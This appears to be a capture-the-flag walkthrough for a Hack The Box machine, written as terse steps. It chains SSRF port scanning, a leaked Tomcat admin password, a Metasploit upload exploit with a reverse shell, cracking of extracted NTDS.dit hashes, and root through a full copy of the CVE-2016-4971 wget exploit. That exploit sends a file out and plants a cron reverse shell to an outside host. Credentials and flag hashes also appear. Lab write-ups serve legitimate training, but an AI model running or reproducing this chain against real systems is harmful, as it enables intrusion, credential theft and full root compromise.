- http://10.10.10.55:60000/url.php?path=
- put http://localhost:80
- send the GET request through Burp and scan ports 1 to 1000
- reference: http://resources.infosecinstitute.com/the-ssrf-vulnerability/#gref
- http://10.10.10.55:60000/url.php?path=http://localhost:888
- you will get the backup
- http://10.10.10.55:60000/url.php?path=http://localhost:888?doc=backup
- view its source
- <user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>
- msfconsole
- use exploit/multi/http/tomcat_mgr_upload
- set HttpPassword 3@g01PdhB!
- set HttpUsername admin
- set RHOST 10.10.10.55
- set RPORT 8080
- set payload linux/x86/shell/reverse_tcp
- set LHOST 10.10.15.104
- set target 2
- run
- python -c 'import pty;pty.spawn("/bin/sh")'
- cd /home/tomcat/to_archive/pentest_data
- you will see:
- total 28312
- drwxr-xr-x 2 tomcat tomcat 4096 Jul 21 13:13 .
- drwxr-xr-x 3 tomcat tomcat 4096 Jul 21 13:13 ..
- -rw-r--r-- 1 tomcat tomcat 16793600 Jul 21 12:16 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
- -rw-r--r-- 1 tomcat tomcat 12189696 Jul 21 12:16 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
- tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$
- download the .dit and .bin files to your PC
- https://implicitdeny.org/2016/05/cracking-domain-passwords-ntds-dit-metasploit-john/
- crack it and you will get the password
- su atanas
- f16tomcat!
- 93f844f50491ef797c9c1b601b4bece8
- for root, go to /tmp
- on your PC, go to the /tmp directory
- nano .wgetrc
- post_file = /root/root.txt
- output_document = /etc/cron.d/wget-root-shell
- https://www.exploit-db.com/exploits/40064/
- see this exploit
- nano wget-exploit.py
- #!/usr/bin/env python
- #
- # Wget 1.18 < Arbitrary File Upload Exploit
- # Dawid Golunski
- # dawid( at )legalhackers.com
- #
- # http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
- #
- # CVE-2016-4971
- #
- import SimpleHTTPServer
- import SocketServer
- import socket;
- class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
- def do_GET(self):
- # This takes care of sending .wgetrc
- print "We have a volunteer requesting " + self.path + " by GET :)\n"
- if "Wget" not in self.headers.getheader('User-Agent'):
- print "But it's not a Wget :( \n"
- self.send_response(200)
- self.end_headers()
- self.wfile.write("Nothing to see here...")
- return
- print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
- self.send_response(301)
- new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
- print "Sending redirect to %s \n"%(new_path)
- self.send_header('Location', new_path)
- self.end_headers()
- def do_POST(self):
- # In here we will receive extracted file and install a PoC cronjob
- print "We have a volunteer requesting " + self.path + " by POST :)\n"
- if "Wget" not in self.headers.getheader('User-Agent'):
- print "But it's not a Wget :( \n"
- self.send_response(200)
- self.end_headers()
- self.wfile.write("Nothing to see here...")
- return
- content_len = int(self.headers.getheader('content-length', 0))
- post_body = self.rfile.read(content_len)
- print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
- print "Sending back a cronjob script as a thank-you for the file..."
- print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
- self.send_response(200)
- self.send_header('Content-type', 'text/plain')
- self.end_headers()
- self.wfile.write(ROOT_CRON)
- print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
- return
- HTTP_LISTEN_IP = ''
- HTTP_LISTEN_PORT = 80
- FTP_HOST = '10.10.14.2'
- FTP_PORT = 21
- ROOT_CRON = "* * * * * root bash -i >& /dev/tcp/10.10.14.2/1234 0>&1"
- handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
- print "Ready? Is your FTP server running?"
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- result = sock.connect_ex((FTP_HOST, FTP_PORT))
- if result == 0:
- print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
- else:
- print "FTP is down :( Exiting."
- exit(1)
- print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
- handler.serve_forever()
- save it, changing the FTP IP to your VPN IP
- then upload that file to the server's /tmp directory
- open new msfconsole
- use auxiliary/server/ftp
- set FTPROOT /tmp
- set LHOST your ip
- run
- then go to the server
- after you upload it
- authbind python wget-exploit.py
- 950d1425795dfd38272c93ccbb63ae2c